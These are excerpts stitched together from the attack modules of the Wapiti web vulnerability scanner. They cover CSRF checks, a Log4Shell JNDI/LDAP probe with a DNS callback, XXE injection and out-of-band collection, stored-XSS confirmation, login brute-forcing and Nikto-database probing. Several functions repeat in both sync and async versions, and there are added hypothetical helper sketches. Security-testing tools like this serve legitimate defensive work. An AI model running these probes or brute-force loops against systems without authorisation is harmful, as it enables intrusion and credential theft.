async def attack(self, request: Request):
    csrf_value = self.is_csrf_present(request)

    # check if token is present
    if not csrf_value:
        vuln_message = _("Lack of anti CSRF token")
    elif not await self.is_csrf_verified(request):
        vuln_message = _("CSRF token '{}' is not properly checked in backend").format(self.csrf_string)
    elif not self.is_csrf_robust(csrf_value):
        vuln_message = _("CSRF token '{}' might be easy to predict").format(self.csrf_string)
    else:
        return

    self.already_vulnerable.append((request.url, request.post_keys))

    self.log_red("---")
    self.log_red(vuln_message)
    self.log_red(request.http_repr())
    self.log_red("---")

    await self.add_vuln_medium(
        request_id=request.path_id,
        category=NAME,
        request=request,
        info=vuln_message
    )
def is_csrf_verified(self, original_request: Request):
    """Check whether anti-csrf token is verified (backend) after submitting request"""
    # Replace anti-csrf token value from form with "wapiti"
    mutated_post_params = [
        param if param[0] != self.csrf_string else [self.csrf_string, "wapiti"]
        for param in original_request.post_params
    ]

    # Replace anti-csrf token value from headers with "wapiti"
    special_headers = {}
    if original_request.headers and self.csrf_string in original_request.headers:
        special_headers[self.csrf_string] = "wapiti"

    mutated_request = Request(
        path=original_request.path,
        method=original_request.method,
        get_params=original_request.get_params,
        post_params=mutated_post_params,
        file_params=original_request.file_params,
        referer=original_request.referer,
        link_depth=original_request.link_depth
    )

    original_response = self.crawler.send(original_request, follow_redirects=True)

    try:
        mutated_response = self.crawler.send(mutated_request, headers=special_headers, follow_redirects=True)
    except ReadTimeout:
        self.log_orange("---")
        self.log_orange(Anomaly.MSG_TIMEOUT, original_request.path)
        self.log_orange(Anomaly.MSG_EVIL_REQUEST)
        self.log_orange(mutated_request.http_repr())
        self.log_orange("---")

        anom_msg = Anomaly.MSG_PARAM_TIMEOUT.format(self.csrf_string)
        self.add_anom(
            request_id=original_request.path_id,
            category=Anomaly.RES_CONSUMPTION,
            level=Anomaly.MEDIUM_LEVEL,
            request=mutated_request,
            info=anom_msg,
        )
    else:
        return not self.is_same_response(original_response, mutated_response)

    return True
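# Note: `is_same_response` is referenced above but not shown in this section. A minimal,
# hypothetical sketch of what such a comparison might check (status code and body only,
# which may differ from the real helper) could look like this:
def is_same_response(self, original_response, mutated_response) -> bool:
    """Return True if both responses look identical (same status code and same body)."""
    if original_response.status != mutated_response.status:
        return False
    return original_response.content == mutated_response.content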
async def _verify_url_vulnerability(self, request: Request, param_uuid: uuid.UUID):
    if not await self._verify_dns(str(param_uuid)):
        return

    await self.add_vuln_critical(
        category=NAME,
        request=request,
        info=_("URL {0} seems vulnerable to Log4Shell attack").format(request.url),
        parameter="",
        wstg=WSTG_CODE
    )

    log_red("---")
    log_red(_("URL {0} seems vulnerable to Log4Shell attack"), request.url)
    log_red(request.http_repr())
    log_red("---")
async def _verify_header_vulnerability(self, modified_request: Request, header: str, payload: str, unique_id: uuid.UUID):
    if await self._verify_dns(str(unique_id)) is True:
        await self.add_vuln_critical(
            category=NAME,
            request=modified_request,
            info=_("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}").format(
                modified_request.url, "header", header
            ),
            parameter=f"{header}: {payload}",
            wstg=WSTG_CODE
        )

        log_red("---")
        log_red(
            _("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}"),
            modified_request.url, "header", header
        )
        log_red(modified_request.http_repr())
        log_red("---")
def attack_body(self, original_request):
    for payload, tags in self.payloads:
        payload = payload.replace("[PATH_ID]", str(original_request.path_id))
        payload = payload.replace("[PARAM_AS_HEX]", "72617720626f6479")  # raw body

        mutated_request = Request(
            original_request.url,
            method="POST",
            enctype="text/xml",
            post_params=payload
        )

        if self.verbose == 2:
            print("[¨] {0}".format(mutated_request))

        try:
            response = self.crawler.send(mutated_request)
        except RequestException:
            self.network_errors += 1
            continue
        else:
            pattern = search_pattern(response.content, self.flag_to_patterns(tags))
            if pattern and not self.false_positive(original_request, pattern):
                self.add_vuln(
                    request_id=original_request.path_id,
                    category=NAME,
                    level=HIGH_LEVEL,
                    request=mutated_request,
                    info="XXE vulnerability leading to file disclosure",
                    parameter="raw body"
                )

                self.log_red("---")
                self.log_red("{0} in {1} leading to file disclosure", self.MSG_VULN, original_request.url)
                self.log_red(Messages.MSG_EVIL_REQUEST)
                self.log_red(mutated_request.http_repr())
                self.log_red("---")

                self.vulnerables.add(original_request.path_id)
                break
async def _verify_param_vulnerability(self, request: Request, param_uuid: uuid.UUID, param_name: str):
    if not await self._verify_dns(str(param_uuid)):
        return

    element_type = "query parameter" if request.method == "GET" else "body parameter"

    await self.add_vuln_critical(
        category=NAME,
        request=request,
        info=_("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}").format(
            request.url, element_type, param_name
        ),
        parameter=f"{param_name}",
        wstg=WSTG_CODE
    )

    log_red("---")
    log_red(
        _("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}"),
        request.url, element_type, param_name
    )
    log_red(request.http_repr())
    log_red("---")
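# The payload injected before these verification steps is not shown in this section. For
# illustration only: a Log4Shell probe usually embeds the unique id in a JNDI/LDAP lookup
# pointing at a DNS callback endpoint, so that a later DNS hit for that id proves the lookup
# was performed. The `dns_endpoint` attribute below is an assumption, not the module's
# confirmed attribute name.
def _build_log4shell_payload(self, unique_id: uuid.UUID) -> str:
    # e.g. "${jndi:ldap://<uuid>.dns-callback.example/a}"
    return "${jndi:ldap://" + f"{unique_id}.{self.dns_endpoint}" + "/a}"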
async def attack_body(self, original_request):
    for payload, tags in self.payloads:
        payload = payload.replace("[PATH_ID]", str(original_request.path_id))
        payload = payload.replace("[PARAM_AS_HEX]", "72617720626f6479")  # raw body

        mutated_request = Request(
            original_request.url,
            method="POST",
            enctype="text/xml",
            post_params=payload
        )

        log_verbose(f"[¨] {mutated_request}")

        try:
            response = await self.crawler.async_send(mutated_request)
        except RequestError:
            self.network_errors += 1
            continue
        else:
            pattern = search_pattern(response.content, self.flag_to_patterns(tags))
            if pattern and not await self.false_positive(original_request, pattern):
                await self.add_vuln_high(
                    request_id=original_request.path_id,
                    category=NAME,
                    request=mutated_request,
                    info="XXE vulnerability leading to file disclosure",
                    parameter="raw body",
                    wstg=WSTG_CODE
                )

                log_red("---")
                log_red("{0} in {1} leading to file disclosure", self.MSG_VULN, original_request.url)
                log_red(Messages.MSG_EVIL_REQUEST)
                log_red(mutated_request.http_repr())
                log_red("---")

                self.vulnerables.add(original_request.path_id)
                break
async def attack(self, request: Request): """This method searches XSS which could be permanently stored in the web application""" url = request.url target_req = Request(url) referer = request.referer headers = {} if referer: headers["referer"] = referer try: response = await self.crawler.async_send(target_req, headers=headers) data = response.content except RequestError: self.network_errors += 1 return # Should we look for taint codes sent with GET in the webpages? # Exploiting those may imply sending more GET requests # Search in the page source for every taint code used by mod_xss for taint in self.tried_xss: input_request = self.tried_xss[taint][0] # Such situations should not occur as it would be stupid to block POST (or GET) requests for mod_xss # and not mod_permanentxss, but it is possible so let's filter that. if not self.do_get and input_request.method == "GET": continue if not self.do_post and input_request.method == "POST": continue if taint.lower() in data.lower(): # Code found in the webpage ! # Did mod_xss saw this as a reflected XSS ? if taint in self.successful_xss: # Yes, it means XSS payloads were injected, not just tainted code. payload, flags = self.successful_xss[taint] if self.check_payload(response, flags, taint): # If we can find the payload again, this is in fact a stored XSS get_params = input_request.get_params post_params = input_request.post_params file_params = input_request.file_params referer = input_request.referer # The following trick may seems dirty but it allows to treat GET and POST requests # the same way. for params_list in [ get_params, post_params, file_params ]: for i, __ in enumerate(params_list): parameter, value = params_list[i] parameter = quote(parameter) if value != taint: continue if params_list is file_params: params_list[i][1][0] = payload else: params_list[i][1] = payload # we found the xss payload again -> stored xss vuln evil_request = Request( input_request.path, method=input_request.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) if request.path == input_request.path: description = _( "Permanent XSS vulnerability found via injection in the parameter {0}" ).format(parameter) else: description = _( "Permanent XSS vulnerability found in {0} by injecting" " the parameter {1} of {2}").format( request.url, parameter, input_request.path) if has_strong_csp(response): description += ".\n" + _( "Warning: Content-Security-Policy is present!" ) await self.add_vuln_high( request_id=request.path_id, category=NAME, request=evil_request, parameter=parameter, info=description) if parameter == "QUERY_STRING": injection_msg = Messages.MSG_QS_INJECT else: injection_msg = Messages.MSG_PARAM_INJECT self.log_red("---") self.log_red(injection_msg, self.MSG_VULN, request.path, parameter) if has_strong_csp(response): self.log_red( _("Warning: Content-Security-Policy is present!" )) self.log_red(Messages.MSG_EVIL_REQUEST) self.log_red(evil_request.http_repr()) self.log_red("---") # FIX: search for the next code in the webpage # Ok the content is stored, but will we be able to inject javascript? else: parameter = self.tried_xss[taint][1] payloads = generate_payloads(response.content, taint, self.PAYLOADS_FILE, self.external_endpoint) flags = self.tried_xss[taint][2] # TODO: check that and make it better if flags.method == PayloadType.get: method = "G" elif flags.method == PayloadType.file: method = "F" else: method = "P" await self.attempt_exploit(method, payloads, input_request, parameter, taint, request)
async def attack(self, request: Request):
    try:
        page = await self.crawler.async_get(Request(request.referer), follow_redirects=True)
    except RequestError:
        self.network_errors += 1
        return

    login_form, username_field_idx, password_field_idx = page.find_login_form()
    if not login_form:
        return

    try:
        failure_text = await self.send_credentials(
            login_form,
            username_field_idx, password_field_idx,
            "invalid", "invalid"
        )
        if self.check_success_auth(failure_text):
            # Ignore this case as it raises false positives
            return
    except RequestError:
        self.network_errors += 1
        return

    tasks = set()
    pending_count = 0
    found = False

    creds_iterator = product(self.get_usernames(), self.get_passwords())
    while True:
        if pending_count < self.options["tasks"] and not self._stop_event.is_set() and not found:
            try:
                username, password = next(creds_iterator)
            except StopIteration:
                pass
            else:
                task = asyncio.create_task(
                    self.test_credentials(
                        login_form,
                        username_field_idx, password_field_idx,
                        username, password,
                        failure_text
                    )
                )
                tasks.add(task)

        if not tasks:
            break

        done_tasks, pending_tasks = await asyncio.wait(
            tasks,
            timeout=0.01,
            return_when=asyncio.FIRST_COMPLETED
        )
        pending_count = len(pending_tasks)

        for task in done_tasks:
            try:
                result = await task
            except RequestError:
                self.network_errors += 1
            else:
                if result:
                    found = True
                    username, password = result

                    vuln_message = _("Credentials found for URL {} : {} / {}").format(
                        request.referer, username, password
                    )

                    # Recreate the request that succeeded in order to print and store it
                    post_params = login_form.post_params
                    get_params = login_form.get_params

                    if login_form.method == "POST":
                        post_params[username_field_idx][1] = username
                        post_params[password_field_idx][1] = password
                    else:
                        get_params[username_field_idx][1] = username
                        get_params[password_field_idx][1] = password

                    evil_request = Request(
                        path=login_form.url,
                        method=login_form.method,
                        post_params=post_params,
                        get_params=get_params,
                        referer=login_form.referer,
                        link_depth=login_form.link_depth
                    )

                    await self.add_vuln_low(
                        request_id=request.path_id,
                        category=NAME,
                        request=evil_request,
                        info=vuln_message,
                        wstg=WSTG_CODE
                    )

                    log_red("---")
                    log_red(vuln_message)
                    log_red(Messages.MSG_EVIL_REQUEST)
                    log_red(evil_request.http_repr())
                    log_red("---")

            tasks.remove(task)

        if self._stop_event.is_set() or found:
            # If we found valid credentials we need to stop pending tasks as they may generate false positives
            # because the session is opened on the website and next attempts may appear as logged in
            for task in pending_tasks:
                task.cancel()
                tasks.remove(task)
def finish(self):
    endpoint_url = "{}get_xxe.php?session_id={}".format(self.internal_endpoint, self._session_id)
    print(_("[*] Asking endpoint URL {} for results, please wait...").format(endpoint_url))
    sleep(2)
    # Once the attacks are over, query the endpoint to see whether it was contacted
    endpoint_request = Request(endpoint_url)
    try:
        response = self.crawler.send(endpoint_request)
    except RequestException:
        self.network_errors += 1
        print(_("[!] Unable to request endpoint URL '{}'").format(self.internal_endpoint))
        return

    data = response.json
    if not isinstance(data, dict):
        return

    for request_id in data:
        original_request = self.persister.get_path_by_id(request_id)
        if original_request is None:
            continue
            # raise ValueError("Could not find the original request with ID {}".format(request_id))

        page = original_request.path

        for hex_param in data[request_id]:
            parameter = unhexlify(hex_param).decode("utf-8")

            for infos in data[request_id][hex_param]:
                request_url = infos["url"]
                # Date in ISO format
                request_date = infos["date"]
                request_ip = infos["ip"]
                request_size = infos["size"]
                payload_name = infos["payload"]

                if parameter == "QUERY_STRING":
                    vuln_message = Messages.MSG_QS_INJECT.format(self.MSG_VULN, page)
                elif parameter == "raw body":
                    vuln_message = _("Out-Of-Band {0} by sending raw XML in request body").format(self.MSG_VULN)
                else:
                    vuln_message = _("Out-Of-Band {0} via injection in the parameter {1}").format(
                        self.MSG_VULN, parameter
                    )

                more_infos = _(
                    "The target sent {0} bytes of data to the endpoint at {1} with IP {2}.\n"
                    "Received data can be seen at {3}."
                ).format(request_size, request_date, request_ip, request_url)

                vuln_message += "\n" + more_infos

                # fallback placeholder in case no matching payload is found below
                payload = (
                    "<xml>"
                    "See https://phonexicum.github.io/infosec/xxe.html#attack-vectors"
                    "</xml>"
                )

                for payload, flags in self.payloads:
                    if "{}.dtd".format(payload_name) in payload:
                        payload = payload.replace("[PATH_ID]", str(original_request.path_id))
                        payload = payload.replace("[PARAM_AS_HEX]", "72617720626f6479")
                        break

                if parameter == "raw body":
                    mutated_request = Request(
                        original_request.path,
                        method="POST",
                        enctype="text/xml",
                        post_params=payload
                    )
                elif parameter == "QUERY_STRING":
                    mutated_request = Request(
                        "{}?{}".format(original_request.path, quote(payload)),
                        method="GET"
                    )
                elif parameter in original_request.get_keys or parameter in original_request.post_keys:
                    mutator = Mutator(
                        methods="G" if original_request.method == "GET" else "P",
                        payloads=[(payload, Flags())],
                        qs_inject=self.must_attack_query_string,
                        parameters=[parameter],
                        skip=self.options.get("skipped_parameters")
                    )
                    mutated_request, __, __, __ = next(mutator.mutate(original_request))
                else:
                    mutator = FileMutator(
                        payloads=[(payload, Flags())],
                        parameters=[parameter],
                        skip=self.options.get("skipped_parameters")
                    )
                    mutated_request, __, __, __ = next(mutator.mutate(original_request))

                self.add_vuln(
                    request_id=original_request.path_id,
                    category=NAME,
                    level=HIGH_LEVEL,
                    request=mutated_request,
                    info=vuln_message,
                    parameter=parameter
                )

                self.log_red("---")
                self.log_red(vuln_message)
                self.log_red(Messages.MSG_EVIL_REQUEST)
                self.log_red(mutated_request.http_repr())
                self.log_red("---")
async def attack(self, request: Request):
    try:
        with open(os.path.join(self.user_config_dir, self.NIKTO_DB)) as nikto_db_file:
            reader = csv.reader(nikto_db_file)
            self.nikto_db = [line for line in reader if line != [] and line[0].isdigit()]
    except IOError:
        logging.warning(_("Problem with local nikto database."))
        logging.info(_("Downloading from the web..."))
        await self.update()

    self.finished = True
    junk_string = "w" + "".join(
        [random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 5000)]
    )
    root_url = request.url
    parts = urlparse(root_url)

    for line in self.nikto_db:
        if self._stop_event.is_set():
            break

        match = match_or = match_and = False
        fail = fail_or = False

        osv_id = line[1]
        path = line[3]
        method = line[4]
        vuln_desc = line[10]
        post_data = line[11]

        path = path.replace("@CGIDIRS", "/cgi-bin/")
        path = path.replace("@ADMIN", "/admin/")
        path = path.replace("@NUKE", "/modules/")
        path = path.replace("@PHPMYADMIN", "/phpMyAdmin/")
        path = path.replace("@POSTNUKE", "/postnuke/")
        path = re.sub(r"JUNK\((\d+)\)", lambda x: junk_string[:int(x.group(1))], path)

        if path[0] == "@":
            continue

        if not path.startswith("/"):
            path = "/" + path

        try:
            url = f"{parts.scheme}://{parts.netloc}{path}"
        except UnicodeDecodeError:
            continue

        if method == "GET":
            evil_request = Request(url)
        elif method == "POST":
            evil_request = Request(url, post_params=post_data, method=method)
        else:
            evil_request = Request(url, post_params=post_data, method=method)

        if self.verbose == 2:
            if method == "GET":
                logging.info("[¨] {0}".format(evil_request.url))
            else:
                logging.info("[¨] {0}".format(evil_request.http_repr()))

        try:
            response = await self.crawler.async_send(evil_request)
        except RequestError:
            self.network_errors += 1
            continue
        except ValueError:
            # ValueError raised by urllib3 (Method cannot contain non-token characters), we don't want to raise
            continue

        page = response.content
        code = response.status
        raw = " ".join([x + ": " + y for x, y in response.headers.items()])
        raw += page

        # First condition (match)
        if len(line[5]) == 3 and line[5].isdigit():
            if code == int(line[5]):
                match = True
        else:
            if line[5] in raw:
                match = True

        # Second condition (or)
        if line[6] != "":
            if len(line[6]) == 3 and line[6].isdigit():
                if code == int(line[6]):
                    match_or = True
            else:
                if line[6] in raw:
                    match_or = True

        # Third condition (and)
        if line[7] != "":
            if len(line[7]) == 3 and line[7].isdigit():
                if code == int(line[7]):
                    match_and = True
            else:
                if line[7] in raw:
                    match_and = True
        else:
            match_and = True

        # Fourth condition (fail)
        if line[8] != "":
            if len(line[8]) == 3 and line[8].isdigit():
                if code == int(line[8]):
                    fail = True
            else:
                if line[8] in raw:
                    fail = True

        # Fifth condition (or)
        if line[9] != "":
            if len(line[9]) == 3 and line[9].isdigit():
                if code == int(line[9]):
                    fail_or = True
            else:
                if line[9] in raw:
                    fail_or = True

        if ((match or match_or) and match_and) and not (fail or fail_or):
            self.log_red("---")
            self.log_red(vuln_desc)
            self.log_red(url)

            refs = []
            if osv_id != "0":
                refs.append("https://vulners.com/osvdb/OSVDB:" + osv_id)

            # CERT
            cert_advisory = re.search("(CA-[0-9]{4}-[0-9]{2})", vuln_desc)
            if cert_advisory is not None:
                refs.append("http://www.cert.org/advisories/" + cert_advisory.group(0) + ".html")

            # SecurityFocus
            securityfocus_bid = re.search("BID-([0-9]{4})", vuln_desc)
            if securityfocus_bid is not None:
                refs.append("http://www.securityfocus.com/bid/" + securityfocus_bid.group(1))

            # Mitre.org
            mitre_cve = re.search("((CVE|CAN)-[0-9]{4}-[0-9]{4,})", vuln_desc)
            if mitre_cve is not None:
                refs.append("http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + mitre_cve.group(0))

            # CERT Incidents
            cert_incident = re.search("(IN-[0-9]{4}-[0-9]{2})", vuln_desc)
            if cert_incident is not None:
                refs.append("http://www.cert.org/incident_notes/" + cert_incident.group(0) + ".html")

            # Microsoft Technet
            ms_bulletin = re.search("(MS[0-9]{2}-[0-9]{3})", vuln_desc)
            if ms_bulletin is not None:
                refs.append("http://www.microsoft.com/technet/security/bulletin/" + ms_bulletin.group(0) + ".asp")

            info = vuln_desc
            if refs:
                self.log_red(_("References:"))
                self.log_red("  {0}".format("\n  ".join(refs)))

                info += "\n" + _("References:") + "\n"
                info += "\n".join(refs)

            self.log_red("---")

            await self.add_vuln_high(category=NAME, request=evil_request, info=info)
async def attack(self, request: Request):
    try:
        page = await self.crawler.async_get(Request(request.referer), follow_redirects=True)
    except RequestError:
        self.network_errors += 1
        return

    login_form, username_field_idx, password_field_idx = page.find_login_form()
    if not login_form:
        return

    try:
        failure_text = await self.test_credentials(
            login_form,
            username_field_idx, password_field_idx,
            "invalid", "invalid"
        )
        if self.check_success_auth(failure_text):
            # Ignore this case as it raises false positives
            return
    except RequestError:
        self.network_errors += 1
        return

    for username, password in product(self.get_usernames(), self.get_passwords()):
        if self._stop_event.is_set():
            break

        try:
            response = await self.test_credentials(
                login_form,
                username_field_idx, password_field_idx,
                username, password
            )
        except RequestError:
            self.network_errors += 1
            continue

        if self.check_success_auth(response) and failure_text != response:
            vuln_message = _("Credentials found for URL {} : {} / {}").format(
                request.referer, username, password
            )

            # Recreate the request that succeeded in order to print and store it
            post_params = login_form.post_params
            get_params = login_form.get_params

            if login_form.method == "POST":
                post_params[username_field_idx][1] = username
                post_params[password_field_idx][1] = password
            else:
                get_params[username_field_idx][1] = username
                get_params[password_field_idx][1] = password

            evil_request = Request(
                path=login_form.url,
                method=login_form.method,
                post_params=post_params,
                get_params=get_params,
                referer=login_form.referer,
                link_depth=login_form.link_depth
            )

            await self.add_vuln_low(
                request_id=request.path_id,
                category=NAME,
                request=evil_request,
                info=vuln_message
            )

            self.log_red("---")
            self.log_red(vuln_message)
            self.log_red(Messages.MSG_EVIL_REQUEST)
            self.log_red(evil_request.http_repr())
            self.log_red("---")
            break
async def test_request_object():
    res1 = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[['post1', 'c'], ['post2', 'd']]
    )

    res2 = Request(
        "http://httpbin.org/post?var1=a&var2=z",
        post_params=[['post1', 'c'], ['post2', 'd']]
    )

    res3 = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[['post1', 'c'], ['post2', 'z']]
    )

    res4 = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[['post1', 'c'], ['post2', 'd']]
    )

    res5 = Request(
        "http://httpbin.org/post?var1=z&var2=b",
        post_params=[['post1', 'c'], ['post2', 'd']]
    )

    res6 = Request(
        "http://httpbin.org/post?var3=z&var2=b",
        post_params=[['post1', 'c'], ['post2', 'd']]
    )

    res7 = Request(
        "http://httpbin.org/post?var1=z&var2=b&var4=e",
        post_params=[['post1', 'c'], ['post2', 'd']]
    )

    res8 = Request(
        "http://httpbin.org/post?var2=d&var1=z",
        post_params=[['post1', 'c'], ['post2', 'd']]
    )

    res10 = Request(
        "http://httpbin.org/post?qs0",
        post_params=[['post1', 'c'], ['post2', 'd']]
    )

    res11 = Request(
        "http://httpbin.org/post?qs1",
        post_params=[['post1', 'c'], ['post2', 'd']]
    )

    res12 = Request(
        "http://httpbin.org/post?qs1",
        post_params=[['post1', 'c'], ['post2', 'd']],
        file_params=[['file1', ('fname1', 'content')], ['file2', ('fname2', 'content')]]
    )

    res13 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/videos")
    res14 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/")
    res15 = Request("https://duckduckgo.com/")
    res16 = Request("https://duckduckgo.com/", post_params=[['q', 'Kung Fury']])
    res17 = Request("http://example.com:8080/dir/?x=3")
    res18 = Request("http://httpbin.org/get?a=1", get_params=[['get1', 'c'], ['get2', 'd']])

    assert res1 < res2
    assert res2 > res3
    assert res1 < res3
    assert res1 == res4
    assert hash(res1) == hash(res4)

    res4.link_depth = 5
    assert hash(res1) == hash(res4)

    assert res1 != res2
    assert res2 >= res1
    assert res1 <= res3
    assert res13.file_name == "videos"
    assert res10.path == "http://httpbin.org/post"
    assert res10.file_name == "post"

    # This one is important as it could break attacks on query string
    assert res10.url == "http://httpbin.org/post?qs0"
    assert res13.parent_dir == res14.url
    assert res15.is_root
    assert res15.parent_dir == res15.url
    assert res13.dir_name == res14.url
    assert res14.dir_name == res14.url
    assert res15.dir_name == res15.url
    assert res15 != res16

    query_list = [res15]
    assert res16 not in query_list
    assert res17.dir_name == "http://example.com:8080/dir/"
    assert res18.url == "http://httpbin.org/get?get1=c&get2=d"
    assert res17.hostname == "example.com:8080"
    assert res1.encoded_get_keys == res8.encoded_get_keys
    assert res17.encoded_get_keys == "x"
    assert res16.encoded_get_keys == ""
    assert res12.parameters_count == 5
    assert res12.encoded_get_keys == "qs1"
    assert res5.hash_params == res8.hash_params
    assert res7.hash_params != res8.hash_params

    assert res6 in [res6, res11]
    assert res6 not in [res11, None]
    assert res11 in [res6, res11]
    assert res11 not in [None, res6]

    print("Tests were successful, now launching representations")
    print("=== Basic representation follows ===")
    print(res1)
    print("=== cURL representation follows ===")
    print(res1.curl_repr)
    print("=== HTTP representation follows ===")
    print(res1.http_repr())
    print("=== POST parameters as an array ===")
    print(res1.post_params)
    print("=== POST keys encoded as string ===")
    print(res1.encoded_post_keys)
    print("=== Upload HTTP representation ===")
    print(res12.http_repr())
    print("=== Upload basic representation ===")
    print(res12)
    print("=== Upload cURL representation ===")
    print(res12.curl_repr)
    print("=== HTTP GET keys as a tuple ===")
    print(res1.get_keys)
    print("=== HTTP POST keys as a tuple ===")
    print(res1.post_keys)
    print("=== HTTP files keys as a tuple ===")
    print(res12.file_keys)
    print('')

    json_req = Request(
        "http://httpbin.org/post?a=b",
        post_params=json.dumps({"z": 1, "a": 2}),
        enctype="application/json"
    )

    crawler = AsyncCrawler("http://httpbin.org/")
    page = await crawler.async_send(json_req)
    assert page.json["json"] == {"z": 1, "a": 2}
    assert page.json["headers"]["Content-Type"] == "application/json"
    assert page.json["form"] == {}

    page = await crawler.async_send(res12)
    assert page.json["files"]

    res19 = Request(
        "http://httpbin.org/post?qs1",
        post_params=[['post1', 'c'], ['post2', 'd']],
        file_params=[['file1', ('fname1', 'content')], ['file2', ('fname2', 'content')]],
        enctype="multipart/form-data"
    )
    page = await crawler.async_send(res19)
    assert page.json["files"]

    await crawler.close()
def attack(self, request: Request):
    self.finished = True
    junk_string = "w" + "".join(
        [random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 5000)]
    )

    urls = self.persister.get_links(attack_module=self.name) if self.do_get else []
    server = next(urls).hostname

    for line in self.nikto_db:
        match = match_or = match_and = False
        fail = fail_or = False

        osv_id = line[1]
        path = line[3]
        method = line[4]
        vuln_desc = line[10]
        post_data = line[11]

        path = path.replace("@CGIDIRS", "/cgi-bin/")
        path = path.replace("@ADMIN", "/admin/")
        path = path.replace("@NUKE", "/modules/")
        path = path.replace("@PHPMYADMIN", "/phpMyAdmin/")
        path = path.replace("@POSTNUKE", "/postnuke/")
        path = re.sub(r"JUNK\((\d+)\)", lambda x: junk_string[:int(x.group(1))], path)

        if path[0] == "@":
            continue

        if not path.startswith("/"):
            path = "/" + path

        try:
            url = "http://" + server + path
        except UnicodeDecodeError:
            continue

        if method == "GET":
            evil_request = Request(url)
        elif method == "POST":
            evil_request = Request(url, post_params=post_data, method=method)
        else:
            evil_request = Request(url, post_params=post_data, method=method)

        if self.verbose == 2:
            if method == "GET":
                print("[¨] {0}".format(evil_request.url))
            else:
                print("[¨] {0}".format(evil_request.http_repr()))

        try:
            response = self.crawler.send(evil_request)
        except RequestException:
            self.network_errors += 1
            continue
        except ValueError:
            # ValueError raised by urllib3 (Method cannot contain non-token characters), we don't want to raise
            continue

        page = response.content
        code = response.status
        raw = " ".join([x + ": " + y for x, y in response.headers.items()])
        raw += page

        # First condition (match)
        if len(line[5]) == 3 and line[5].isdigit():
            if code == int(line[5]):
                match = True
        else:
            if line[5] in raw:
                match = True

        # Second condition (or)
        if line[6] != "":
            if len(line[6]) == 3 and line[6].isdigit():
                if code == int(line[6]):
                    match_or = True
            else:
                if line[6] in raw:
                    match_or = True

        # Third condition (and)
        if line[7] != "":
            if len(line[7]) == 3 and line[7].isdigit():
                if code == int(line[7]):
                    match_and = True
            else:
                if line[7] in raw:
                    match_and = True
        else:
            match_and = True

        # Fourth condition (fail)
        if line[8] != "":
            if len(line[8]) == 3 and line[8].isdigit():
                if code == int(line[8]):
                    fail = True
            else:
                if line[8] in raw:
                    fail = True

        # Fifth condition (or)
        if line[9] != "":
            if len(line[9]) == 3 and line[9].isdigit():
                if code == int(line[9]):
                    fail_or = True
            else:
                if line[9] in raw:
                    fail_or = True

        if ((match or match_or) and match_and) and not (fail or fail_or):
            self.log_red("---")
            self.log_red(vuln_desc)
            self.log_red(url)

            refs = []
            if osv_id != "0":
                refs.append("https://vulners.com/osvdb/OSVDB:" + osv_id)

            # CERT
            cert_advisory = re.search("(CA-[0-9]{4}-[0-9]{2})", vuln_desc)
            if cert_advisory is not None:
                refs.append("http://www.cert.org/advisories/" + cert_advisory.group(0) + ".html")

            # SecurityFocus
            securityfocus_bid = re.search("BID-([0-9]{4})", vuln_desc)
            if securityfocus_bid is not None:
                refs.append("http://www.securityfocus.com/bid/" + securityfocus_bid.group(1))

            # Mitre.org
            mitre_cve = re.search("((CVE|CAN)-[0-9]{4}-[0-9]{4,})", vuln_desc)
            if mitre_cve is not None:
                refs.append("http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + mitre_cve.group(0))

            # CERT Incidents
            cert_incident = re.search("(IN-[0-9]{4}-[0-9]{2})", vuln_desc)
            if cert_incident is not None:
                refs.append("http://www.cert.org/incident_notes/" + cert_incident.group(0) + ".html")

            # Microsoft Technet
            ms_bulletin = re.search("(MS[0-9]{2}-[0-9]{3})", vuln_desc)
            if ms_bulletin is not None:
                refs.append("http://www.microsoft.com/technet/security/bulletin/" + ms_bulletin.group(0) + ".asp")

            info = vuln_desc
            if refs:
                self.log_red(_("References:"))
                self.log_red("  {0}".format("\n  ".join(refs)))

                info += "\n" + _("References:") + "\n"
                info += "\n".join(refs)

            self.log_red("---")

            self.add_vuln(category=NAME, level=HIGH_LEVEL, request=evil_request, info=info)